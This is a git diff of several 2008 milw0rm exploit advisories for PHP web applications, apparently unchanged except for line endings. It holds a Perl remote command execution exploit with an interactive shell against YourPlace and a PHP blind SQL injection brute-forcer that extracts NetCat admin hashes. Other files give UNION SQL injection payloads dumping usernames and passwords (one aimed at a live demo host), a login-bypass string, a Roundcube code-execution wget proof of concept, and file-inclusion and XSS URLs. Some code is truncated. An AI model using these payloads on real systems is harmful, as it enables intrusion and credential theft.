@@ -1,236 +1,236 @@ -[START] - -############################################################################################################################################ -[0x01] Informations: - -Script : YourPlace 0.5 (beta 1) -Download : http://www.hotscripts.com/jump.php?listing_id=80545&jump_type=1 -Vulnerability : DB Disclosure / Arbitrary Data Saving (RCE EXPLOIT) / Arbitrary File Upload / PHPInfo Disclosure / User Change Account -Author : Osirys -Contact : osirys[at]live[dot]it -Website : http://osirys.org -Notes : Proud to be Italian -Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX - -* This script has also other vulnerability. Here you can find just the major ones ! - I wrote a simple RCE Exploit also. - - -############################################################################################################################################ -[0x02] Bug: [Database Disclosure] -###### - -Vulnerable file is: /[path]/user/info/users.txt - -This script uses a .txt file to store usernames and passwords. - -### [!] EXPLOIT: - 1) Go at: /[path]/user/info/users.txt - 2) Get username and password ! - ex: osirys $1$H9mfzCTo$gbuasEowB1agfEqWolcGR. - username password crypted with crypt function - - -############################################################################################################################################ -[0x03] Bug: [Arbitrary Data Saving] ## RCE EXPLOIT !! -###### - -Bugged file is: /[path]/internettoolbar/edit.php - -To exploit this vulnerability, we must be logged in. - -[CODE] - - $fav5_url = $_POST['fav5_url']; - $fav1_name = $_POST['fav5_name']; - - $write = ""; - - $write = str_replace('$','$',$write); - $fp = fopen("../user/internettoolbar/index.php", "w+"); - $fw = fwrite($fp, $write); - -[/CODE] - -All the $fav variables come from POST. There is any cheek on what the user put in the form of $fav vars. -Then the script will save the value of this vars in /[path]/user/internettoolbar/index.php. 
-So we can put an evil php code ;) -I wrote a simple exploit, a simple proof of concept, change it in your own way ;) -This exploit can be adapted to your own needs. - -############################################################ -########################################## -## Remote Command Execution Perl Exploit - -[code] - -#!/usr/bin/perl - -use HTTP::Request; -use LWP::UserAgent; - -my $path = "/internettoolbar/edit.php"; -my $exec_path = "/user/internettoolbar/index.php"; -my $c0de = "lol.it';?>new; -my $post = $ua->post($url, - [ - fav1_url => $c0de, - do => submit - ]); - -if ($post->is_success) { - print "[+] Commands:\n"; - print " exit -> quit the exploit \n"; - print " your command -> exec your cmd \n"; - &exec_cmd; -} -else { - print "[-] Can't write hell code !\n"; - exit(0); -} - -sub exec_cmd { - print "shell[Osirys]$>\n"; - $cmd = ; - $cmd !~ /exit/ || die "[-] Quitting ..\n"; - $exec_url = ($host.$exec_path."?cmd=".$cmd); - $re = query($exec_url); - if ($re =~ /\?>(.*)/) { - print "[*] $1\n"; - &exec_cmd; - } - else { - print "[-] Undefined output or bad cmd !\n"; - &exec_cmd; - } -} - -sub query() { - $link = $_[0]; - my $req = HTTP::Request->new(GET => $link); - my $ua = LWP::UserAgent->new(); - $ua->timeout(4); - my $response = $ua->request($req); - return $response->content; -} - -sub cheek() { - my $host = $_[0]; - if ($host =~ /http:\/\/(.*)/) { - return 1; - } - else { - return 0; - } -} - -sub banner { - print "\n". - " ============================ \n". - " YourPlace RCE Exploit \n". - " Coded by Osirys \n". - " osirys[at]live[dot]it \n". - " Proud to be italian \n". 
- " ============================ \n\n"; -} - -sub help() { - my $error = $_[0]; - if ($error == -1) { - &banner; - print "\n[-] Cheek that you typed the hostname address and the command to execute !\n"; - } - elsif ($error == -2) { - &banner; - print "\n[-] Bad hostname address !\n"; - } - print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; - exit(0); -} - -[/CODE] - - -############################################################################################################################################ -[0x04] Bug: [Arbitrary File Upload] -###### - -Bugged file is: /[path]/apps/standard/upload.php - -To upload our local file we must be logged in. Then we can upload any file. -The bug here is to allow user to upload file of any extensions, in fact there isn't any extension cheek. - - -### [!] EXPLOIT: - 1) Go at: /[path]/apps/standard/upload.php - 2) Upload your local file. - 3) Cheek it here: /[path]/user/uploads/your_file.your_ext - - -############################################################################################################################################ -[0x05] Bug: [PHPInfo Disclosure] -###### - -Vulnerable file is: /[path]/user/uploads/phpinfo.php - - -### [!] EXPLOIT: - 1) Go at /[path]/user/uploads/phpinfo.php - 2) Get php information - - -############################################################################################################################################ -[0x06] Bug: [User Change Account] -###### - -Bugged file is: /[path]/login/register.php - -[CODE] - -if (isset ($_POST['submit'])) { - $fp = fopen ( '../user/info/users.txt', 'w+' ); - - if ($fp){ - $data = $_POST['username']."\t".crypt($_POST['password'])."\r\n"; - fwrite ( $fp, $data ); - fclose ( $fp ); - echo ":-)"; - } - -[/CODE] - -Registering a new user, the old one will be deleted. - - -### [!] 
EXPLOIT: Go at: /[path]/login/register_form.php - Register your new user - - -############################################################################################################################################ - -[/END] - -# milw0rm.com [2008-12-22] +[START] + +############################################################################################################################################ +[0x01] Informations: + +Script : YourPlace 0.5 (beta 1) +Download : http://www.hotscripts.com/jump.php?listing_id=80545&jump_type=1 +Vulnerability : DB Disclosure / Arbitrary Data Saving (RCE EXPLOIT) / Arbitrary File Upload / PHPInfo Disclosure / User Change Account +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + +* This script has also other vulnerability. Here you can find just the major ones ! + I wrote a simple RCE Exploit also. + + +############################################################################################################################################ +[0x02] Bug: [Database Disclosure] +###### + +Vulnerable file is: /[path]/user/info/users.txt + +This script uses a .txt file to store usernames and passwords. + +### [!] EXPLOIT: + 1) Go at: /[path]/user/info/users.txt + 2) Get username and password ! + ex: osirys $1$H9mfzCTo$gbuasEowB1agfEqWolcGR. + username password crypted with crypt function + + +############################################################################################################################################ +[0x03] Bug: [Arbitrary Data Saving] ## RCE EXPLOIT !! +###### + +Bugged file is: /[path]/internettoolbar/edit.php + +To exploit this vulnerability, we must be logged in. 
+ +[CODE] + + $fav5_url = $_POST['fav5_url']; + $fav1_name = $_POST['fav5_name']; + + $write = ""; + + $write = str_replace('$','$',$write); + $fp = fopen("../user/internettoolbar/index.php", "w+"); + $fw = fwrite($fp, $write); + +[/CODE] + +All the $fav variables come from POST. There is any cheek on what the user put in the form of $fav vars. +Then the script will save the value of this vars in /[path]/user/internettoolbar/index.php. +So we can put an evil php code ;) +I wrote a simple exploit, a simple proof of concept, change it in your own way ;) +This exploit can be adapted to your own needs. + +############################################################ +########################################## +## Remote Command Execution Perl Exploit + +[code] + +#!/usr/bin/perl + +use HTTP::Request; +use LWP::UserAgent; + +my $path = "/internettoolbar/edit.php"; +my $exec_path = "/user/internettoolbar/index.php"; +my $c0de = "lol.it';?>new; +my $post = $ua->post($url, + [ + fav1_url => $c0de, + do => submit + ]); + +if ($post->is_success) { + print "[+] Commands:\n"; + print " exit -> quit the exploit \n"; + print " your command -> exec your cmd \n"; + &exec_cmd; +} +else { + print "[-] Can't write hell code !\n"; + exit(0); +} + +sub exec_cmd { + print "shell[Osirys]$>\n"; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($host.$exec_path."?cmd=".$cmd); + $re = query($exec_url); + if ($re =~ /\?>(.*)/) { + print "[*] $1\n"; + &exec_cmd; + } + else { + print "[-] Undefined output or bad cmd !\n"; + &exec_cmd; + } +} + +sub query() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub banner { + print "\n". + " ============================ \n". + " YourPlace RCE Exploit \n". + " Coded by Osirys \n". 
+ " osirys[at]live[dot]it \n". + " Proud to be italian \n". + " ============================ \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you typed the hostname address and the command to execute !\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +[/CODE] + + +############################################################################################################################################ +[0x04] Bug: [Arbitrary File Upload] +###### + +Bugged file is: /[path]/apps/standard/upload.php + +To upload our local file we must be logged in. Then we can upload any file. +The bug here is to allow user to upload file of any extensions, in fact there isn't any extension cheek. + + +### [!] EXPLOIT: + 1) Go at: /[path]/apps/standard/upload.php + 2) Upload your local file. + 3) Cheek it here: /[path]/user/uploads/your_file.your_ext + + +############################################################################################################################################ +[0x05] Bug: [PHPInfo Disclosure] +###### + +Vulnerable file is: /[path]/user/uploads/phpinfo.php + + +### [!] EXPLOIT: + 1) Go at /[path]/user/uploads/phpinfo.php + 2) Get php information + + +############################################################################################################################################ +[0x06] Bug: [User Change Account] +###### + +Bugged file is: /[path]/login/register.php + +[CODE] + +if (isset ($_POST['submit'])) { + $fp = fopen ( '../user/info/users.txt', 'w+' ); + + if ($fp){ + $data = $_POST['username']."\t".crypt($_POST['password'])."\r\n"; + fwrite ( $fp, $data ); + fclose ( $fp ); + echo ":-)"; + } + +[/CODE] + +Registering a new user, the old one will be deleted. + + +### [!] 
EXPLOIT: Go at: /[path]/login/register_form.php + Register your new user + + +############################################################################################################################################ + +[/END] + +# milw0rm.com [2008-12-22] diff --git a/platforms/php/webapps/7546.txt b/platforms/php/webapps/7546.txt index c6593881d..4aedf40ed 100755 --- a/platforms/php/webapps/7546.txt +++ b/platforms/php/webapps/7546.txt 
@@ -1,33 +1,33 @@ -############################################################# -Joomla Component com_volunteer(job_id) SQL-injection -############################################################# - - -################################################### -#[~] Author : boom3rang -#[~] Site : www.khg-crew.ws -#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. ----------------------------------------- -#[!] Volunteer -#[!] 05.04.2007 -#[!] John Pan -#[!] johnpanq@sina.com -#[!] 2.0 -################################################### - -Example: -http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit] - -Exploit: --9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users-- - -LiveDEMO: -http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1 - -############################## -#[!] Proud 2 be Albanian -#[!] Proud 2 be Muslim -#[!] United States of Albania -############################## - -# milw0rm.com [2008-12-22] +############################################################# +Joomla Component com_volunteer(job_id) SQL-injection +############################################################# + + +################################################### +#[~] Author : boom3rang +#[~] Site : www.khg-crew.ws +#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. +---------------------------------------- +#[!] Volunteer +#[!] 05.04.2007 +#[!] John Pan +#[!] johnpanq@sina.com +#[!] 
2.0 +################################################### + +Example: +http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit] + +Exploit: +-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users-- + +LiveDEMO: +http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1 + +############################## +#[!] Proud 2 be Albanian +#[!] Proud 2 be Muslim +#[!] United States of Albania +############################## + +# milw0rm.com [2008-12-22] diff --git a/platforms/php/webapps/7548.php b/platforms/php/webapps/7548.php index 01194cece..ef3ab80e3 100755 --- a/platforms/php/webapps/7548.php +++ b/platforms/php/webapps/7548.php 
@@ -1,85 +1,85 @@ -search, $this->replace, $text); - -Some patterns in $this->search allow interpret PHP code using the "e" -flag, i.e.: -'/]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // -'/]*>(.+?)<\/b>/ie', // -'/]*>(.+?)<\/th>/ie', // and - -In concrete those would be replaced by: -'$this->_build_link_list("\\2", "\\3")', // -'strtoupper("\\1")', // -"strtoupper(\"\t\t\\1\n\")", // and - -Now using PHP complex (curly) syntax we can take advantage of this to -interpret arbitrary PHP code, evaluating PHP code embedded inside -strings. - - -Proof of Concept ----- -As this vulnerability was discovered in-the-wild: -http://trac.roundcube.net/ticket/1485618 was quite sure that would be -exploitable, using PHP curly we can execute phpinfo(): - -wget -q --header="Content-Type: ''" \ --O - --post-data='{${phpinfo()}}' \ ---no-check-certificate \ -http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php - -Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc -to avoid using single or double quotes the arbitrary shell command -execution is fully feasible. As this vulnerability was discovered last -week no more details will be published yet, more info will be available -at http://sofistic.net. - - - --- Jacobo Avariento Gimeno IT Security Department @ Sofistic Your security, our concern! http://sofistic.net - -# milw0rm.com [2008-12-22] +Public Release Date of POC: 2008-12-22 +Author: Jacobo Avariento Gimeno (Sofistic) +CVE id: CVE-2008-5619 +Bugtraq id: 32799 +Severity: Critical +Vulnerability reported by: RealMurphy + + +Intro +---- +Roundcube Webmail is a browser-based IMAP client that uses +"chuggnutt.com HTML to Plain Text Conversion" library to convert +HTML text to plain text, this library uses the preg_replace PHP +function in an insecure manner. 
+ +Vulnerable versions: +Round Cube RoundCube Webmail 0.2-3 beta +Round Cube RoundCube Webmail 0.2-1 alpha (tested) + + +Analysis of the vulnerable code +---- +The script bin/html2text.php creates an instance of the class html2text +with the given POST data, the problem arises in the file +program/lib/html2text.php in function _convert() on line 381: + + // Run our defined search-and-replace + $text = preg_replace($this->search, $this->replace, $text); + +Some patterns in $this->search allow interpret PHP code using the "e" +flag, i.e.: +'/]*href=("|\')([^"\']+)\1[^>]*>(.+?)<\/a>/ie', // +'/]*>(.+?)<\/b>/ie', // +'/]*>(.+?)<\/th>/ie', // and + +In concrete those would be replaced by: +'$this->_build_link_list("\\2", "\\3")', // +'strtoupper("\\1")', // +"strtoupper(\"\t\t\\1\n\")", // and + +Now using PHP complex (curly) syntax we can take advantage of this to +interpret arbitrary PHP code, evaluating PHP code embedded inside +strings. + + +Proof of Concept +---- +As this vulnerability was discovered in-the-wild: +http://trac.roundcube.net/ticket/1485618 was quite sure that would be +exploitable, using PHP curly we can execute phpinfo(): + +wget -q --header="Content-Type: ''" \ +-O - --post-data='{${phpinfo()}}' \ +--no-check-certificate \ +http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php + +Using PHP curly syntax plus some tricks to bypass PHP magic_quotes_gpc +to avoid using single or double quotes the arbitrary shell command +execution is fully feasible. As this vulnerability was discovered last +week no more details will be published yet, more info will be available +at http://sofistic.net. + + + +-- Jacobo Avariento Gimeno IT Security Department @ Sofistic Your security, our concern! http://sofistic.net + +# milw0rm.com [2008-12-22] diff --git a/platforms/php/webapps/7551.txt b/platforms/php/webapps/7551.txt index 2027d74bd..fe1a33da4 100755 --- a/platforms/php/webapps/7551.txt +++ b/platforms/php/webapps/7551.txt 
@@ -1,44 +1,44 @@ - ----------------------------------------------------- - Calendar Script v1.1 Admin Login Bypass Vulnerability - ----------------------------------------------------- - by athos - staker[at]hotmail[dot]it - http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1 - - File Vuln "index.php" (code details) - - ------------------------------------------------------------ - - 4. $action = $_POST['action']; - 5. - 6. switch($action) { - 7. case 'login': - 8. // login - 9. $username = stripslashes(trim($_POST['username'])); - 10. $password = sha1(stripslashes(trim($_POST['password']))); - 11. - 12. if(empty($username) || empty($password)) { - 13. // Stop, someone tried entering nothing into here - 14. // Show an error. - 15. $loginMsg = 'You must enter a username and password'; - 16. } else { - 17. // The input seems to be ok, check it against the database. - 18. $checkDetails = mysql_query("SELECT id FROM user WHERE username='$username' AND password='$password' LIMIT 1", $conn); - - ------------------------------------------------------------ - - Exploit - - http://[host]/[path]/index.php - - (Login) Username: ' or 1=1# & Password: anything - - ------------------------------------------------------------ - - Fix: $username = mysql_real_escape_string($_POST['username']); - - Note: works regardless php.ini settings (str0ke =D) - don't add me on msn messenger - - ------------------------------------------------------------ - -# milw0rm.com [2008-12-22] + ----------------------------------------------------- + Calendar Script v1.1 Admin Login Bypass Vulnerability + ----------------------------------------------------- + by athos - staker[at]hotmail[dot]it + http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1 + + File Vuln "index.php" (code details) + + ------------------------------------------------------------ + + 4. $action = $_POST['action']; + 5. + 6. switch($action) { + 7. case 'login': + 8. // login + 9. 
$username = stripslashes(trim($_POST['username'])); + 10. $password = sha1(stripslashes(trim($_POST['password']))); + 11. + 12. if(empty($username) || empty($password)) { + 13. // Stop, someone tried entering nothing into here + 14. // Show an error. + 15. $loginMsg = 'You must enter a username and password'; + 16. } else { + 17. // The input seems to be ok, check it against the database. + 18. $checkDetails = mysql_query("SELECT id FROM user WHERE username='$username' AND password='$password' LIMIT 1", $conn); + + ------------------------------------------------------------ + + Exploit + + http://[host]/[path]/index.php + + (Login) Username: ' or 1=1# & Password: anything + + ------------------------------------------------------------ + + Fix: $username = mysql_real_escape_string($_POST['username']); + + Note: works regardless php.ini settings (str0ke =D) + don't add me on msn messenger + + ------------------------------------------------------------ + +# milw0rm.com [2008-12-22] diff --git a/platforms/php/webapps/7552.txt b/platforms/php/webapps/7552.txt index 8cf31b596..1d91b5e6e 100755 --- a/platforms/php/webapps/7552.txt +++ b/platforms/php/webapps/7552.txt 
@@ -1,26 +1,26 @@ -############################################################### -# -# REDPEACH CMS - SQL Injection Vulnerability -# http://www.redpeach.de/ -# -# Vulnerability discovered by: Lidloses_Auge -# Greetz to: -=Player=- , Suicide, g4ms3, enco, -# Palme, GPM, karamble, Free-Hack -# Date: 23.12.2008 -# -############################################################### -# -# Admin Panel: [Target]/admin/login.php -# Description: The Files "index.php" and "page.php" contain -# vulnerable SQL Querys at the GET Parameter "zv". -# In the most cases you need a table prefix, which -# is similar to the websites' name, so you can guess. -# After table prefix there's "_user". -# The important column names are "username" and "password". -# The number of columns is 8 almost everytime. -# -# Example: http://www.website.com/page.php?pageid=1&zv=null+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+website_user+limit+0,1/* -# -############################################################### - -# milw0rm.com [2008-12-22] +############################################################### +# +# REDPEACH CMS - SQL Injection Vulnerability +# http://www.redpeach.de/ +# +# Vulnerability discovered by: Lidloses_Auge +# Greetz to: -=Player=- , Suicide, g4ms3, enco, +# Palme, GPM, karamble, Free-Hack +# Date: 23.12.2008 +# +############################################################### +# +# Admin Panel: [Target]/admin/login.php +# Description: The Files "index.php" and "page.php" contain +# vulnerable SQL Querys at the GET Parameter "zv". +# In the most cases you need a table prefix, which +# is similar to the websites' name, so you can guess. +# After table prefix there's "_user". +# The important column names are "username" and "password". +# The number of columns is 8 almost everytime. 
+# +# Example: http://www.website.com/page.php?pageid=1&zv=null+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+website_user+limit+0,1/* +# +############################################################### + +# milw0rm.com [2008-12-22] diff --git a/platforms/php/webapps/7558.txt b/platforms/php/webapps/7558.txt index 8378adc88..6cbeea42e 100755 --- a/platforms/php/webapps/7558.txt +++ b/platforms/php/webapps/7558.txt @@ -1,26 +1,26 @@ -phpLD 3.3 Blind SQL Injection -http://www.phplinkdirectory.com/ - -magic_quotes_gpc = Off -register_globals = On - -Vulnerable: -GET http://site/phpld/page.php?name= - -True Request: -(validpagename)' or 1=1# - -False Request: -(validpagename)' or 1=0# - -Try this (urlencode): -(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc... - -Field value example: -{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f - - -- Seasons Greetings - -- http://nukeit.org - - -# milw0rm.com [2008-12-23] +phpLD 3.3 Blind SQL Injection +http://www.phplinkdirectory.com/ + +magic_quotes_gpc = Off +register_globals = On + +Vulnerable: +GET http://site/phpld/page.php?name= + +True Request: +(validpagename)' or 1=1# + +False Request: +(validpagename)' or 1=0# + +Try this (urlencode): +(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc... + +Field value example: +{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f + + +- Seasons Greetings - +- http://nukeit.org - + +# milw0rm.com [2008-12-23] diff --git a/platforms/php/webapps/7559.php b/platforms/php/webapps/7559.php index c44f3d96f..6e56a6ea4 100755 --- a/platforms/php/webapps/7559.php +++ b/platforms/php/webapps/7559.php 
@@ -1,215 +1,215 @@ - - - [+] Brute 42 symbol... - ..................................... - [+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9 - - - [+] Exploiting is finished successfully - [+] Login - admin - [+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9 - [+] Decrypt MySQL hash and login into NetCat CMS. - -*/ - - -function http_connect($query) -{ - - global $server; - - $headers = array( - 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', - 'Referer' => $server - ); - - $res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET); - $res_http->addHeaders($headers); - - try { - $response = $res_http->send()->getBody(); - - if (eregi("page_header", $response)) - { - return 1; - } - else - { - return 0; - } - - } catch (HttpException $exception) { - - print "[-] Not connected"; - exit(0); - - } - -} - -function brute($User_id,$table) -{ - $ret_str = ""; - - for ($i=1;$i<43;$i++) - { - print "[+] Brute $i symbol...\n"; - - for ($j=42;$j<123;$j++) - { - $q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*"; - - if (http_connect($q)) - { - $ret_str=$ret_str.chr($j); - print chr($j)."\n"; - break; - } - print "."; - - if ($j == 57) $j = 96; - if ($j == 42) $j = 47; - - } - - if ($j == 123) break; - } - - return $ret_str; -} - - -function help_argc($script_name) -{ -print " -usage: - -# ./".$script_name." -s=NetCat_server -u=User_ID - -The options are required: - -u The user identifier (number in table) - -s Target for exploiting - -example: - -# ./".$script_name." -s=http://localhost/netcat/ -u=1 -[+] Phase 1 brute login. -[+] Brute 1 symbol... -..1 -[+] Brute 2 symbol... -..................................... -[+] Phase 1 successfully finished: 1 -[+] Phase 2 brute password-hash. -[+] Brute 1 symbol... -..................................... 
-[+] Phase 2 successfully finished: - - -[+] Exploiting is finished successfully -[+] Login - 1 -[+] MySQL hash - -[+] You can login into NetCat CMS with the empty password -"; -} - -function successfully($login,$hash) -{ -print " - -[+] Exploiting is finished successfully -[+] Login - $login -[+] MySQL hash - $hash -"; - -if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n"; -else print "[+] You can login into NetCat CMS with the empty password\n"; - -} - -if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?'))) -{ - help_argc($argv[0]); - exit(0); -} -else -{ - $ARG = array(); - foreach ($argv as $arg) { - if (strpos($arg, '-') === 0) { - $key = substr($arg,1,1); - if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); - } - } - - if ($ARG[s] && $ARG[u]) - { - $server = $ARG[s]; - $User_id = intval($ARG[u]); - $User_id--; - - print "[+] Phase 1 brute login.\n"; - $login = brute($User_id,"Login"); - print "\n[+] Phase 1 successfully finished: $login\n"; - - print "[+] Phase 2 brute password-hash.\n"; - $hash = brute($User_id,"Password"); - print "\n[+] Phase 2 successfully finished: $hash\n"; - - successfully($login,$hash); - } - else - { - help_argc($argv[0]); - exit(0); - } - -} - -?> - -# milw0rm.com [2008-12-23] + + + [+] Brute 42 symbol... + ..................................... + [+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9 + + + [+] Exploiting is finished successfully + [+] Login - admin + [+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9 + [+] Decrypt MySQL hash and login into NetCat CMS. 
+ +*/ + + +function http_connect($query) +{ + + global $server; + + $headers = array( + 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', + 'Referer' => $server + ); + + $res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET); + $res_http->addHeaders($headers); + + try { + $response = $res_http->send()->getBody(); + + if (eregi("page_header", $response)) + { + return 1; + } + else + { + return 0; + } + + } catch (HttpException $exception) { + + print "[-] Not connected"; + exit(0); + + } + +} + +function brute($User_id,$table) +{ + $ret_str = ""; + + for ($i=1;$i<43;$i++) + { + print "[+] Brute $i symbol...\n"; + + for ($j=42;$j<123;$j++) + { + $q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*"; + + if (http_connect($q)) + { + $ret_str=$ret_str.chr($j); + print chr($j)."\n"; + break; + } + print "."; + + if ($j == 57) $j = 96; + if ($j == 42) $j = 47; + + } + + if ($j == 123) break; + } + + return $ret_str; +} + + +function help_argc($script_name) +{ +print " +usage: + +# ./".$script_name." -s=NetCat_server -u=User_ID + +The options are required: + -u The user identifier (number in table) + -s Target for exploiting + +example: + +# ./".$script_name." -s=http://localhost/netcat/ -u=1 +[+] Phase 1 brute login. +[+] Brute 1 symbol... +..1 +[+] Brute 2 symbol... +..................................... +[+] Phase 1 successfully finished: 1 +[+] Phase 2 brute password-hash. +[+] Brute 1 symbol... +..................................... 
+[+] Phase 2 successfully finished: + + +[+] Exploiting is finished successfully +[+] Login - 1 +[+] MySQL hash - +[+] You can login into NetCat CMS with the empty password +"; +} + +function successfully($login,$hash) +{ +print " + +[+] Exploiting is finished successfully +[+] Login - $login +[+] MySQL hash - $hash +"; + +if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n"; +else print "[+] You can login into NetCat CMS with the empty password\n"; + +} + +if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?'))) +{ + help_argc($argv[0]); + exit(0); +} +else +{ + $ARG = array(); + foreach ($argv as $arg) { + if (strpos($arg, '-') === 0) { + $key = substr($arg,1,1); + if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); + } + } + + if ($ARG[s] && $ARG[u]) + { + $server = $ARG[s]; + $User_id = intval($ARG[u]); + $User_id--; + + print "[+] Phase 1 brute login.\n"; + $login = brute($User_id,"Login"); + print "\n[+] Phase 1 successfully finished: $login\n"; + + print "[+] Phase 2 brute password-hash.\n"; + $hash = brute($User_id,"Password"); + print "\n[+] Phase 2 successfully finished: $hash\n"; + + successfully($login,$hash); + } + else + { + help_argc($argv[0]); + exit(0); + } + +} + +?> + +# milw0rm.com [2008-12-23] diff --git a/platforms/php/webapps/7560.txt b/platforms/php/webapps/7560.txt index 1b085482f..c0280a682 100755 --- a/platforms/php/webapps/7560.txt +++ b/platforms/php/webapps/7560.txt 
@@ -1,48 +1,48 @@ -NetCat <= 3.12 Multiple Remote Vulnerabilities - -The description: -The set vulnerability in CMS NetCat versions 3.12 and more low was revealed. - -1. Multiple File Including Vulnerabilities - -Vulnerability exists for the reason that direct access to some files, around logicians of work of the appendix is possible. -It gives the chance to redefine internal variables which are transferred as arguments in function include (). -Examples of vulnerable files: -/netcat/modules/netshop/post.php?system=../../../../.htaccess%00 -/netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00 -/netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00 -/netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00 -/netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00 - -The note: -For vulnerability operation the following options PHP are required: register_globals=On and magic_quotes_gpc=Off - -2. Blind SQL Injection Vulnerabilities - -Examples of vulnerable files: -/netcat/modules/auth/password_recovery.php?=1'SQL_code - -Example: -/netcat/modules/auth/password_recovery.php?=1'/**/OR/**/VERSION()/**/LIKE/**/'4%'/* - -The note: -For vulnerability operation the following options PHP are required:magic_quotes_gpc=Off - -3. Multiple Cross-site Scripting Vulnerabilities - -Examples of vulnerable files: -/netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" -/netcat/FCKeditor/neditor.php?form=&control= etc. - -4. HTTP Response Splitting - -Examples of vulnerable files: -/netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com -/netcat/modules/linkmanager/redirect.php?url=http://www.google.com - -5. CRLF injection - -Vulnerability exists at the moment of value installation %0a in COOKIEvariables. -Vulnerability has been found out at the reference to a file /netcat/add.php. 
- -# milw0rm.com [2008-12-23] +NetCat <= 3.12 Multiple Remote Vulnerabilities + +The description: +The set vulnerability in CMS NetCat versions 3.12 and more low was revealed. + +1. Multiple File Including Vulnerabilities + +Vulnerability exists for the reason that direct access to some files, around logicians of work of the appendix is possible. +It gives the chance to redefine internal variables which are transferred as arguments in function include (). +Examples of vulnerable files: +/netcat/modules/netshop/post.php?system=../../../../.htaccess%00 +/netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00 +/netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00 +/netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00 +/netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00 + +The note: +For vulnerability operation the following options PHP are required: register_globals=On and magic_quotes_gpc=Off + +2. Blind SQL Injection Vulnerabilities + +Examples of vulnerable files: +/netcat/modules/auth/password_recovery.php?=1'SQL_code + +Example: +/netcat/modules/auth/password_recovery.php?=1'/**/OR/**/VERSION()/**/LIKE/**/'4%'/* + +The note: +For 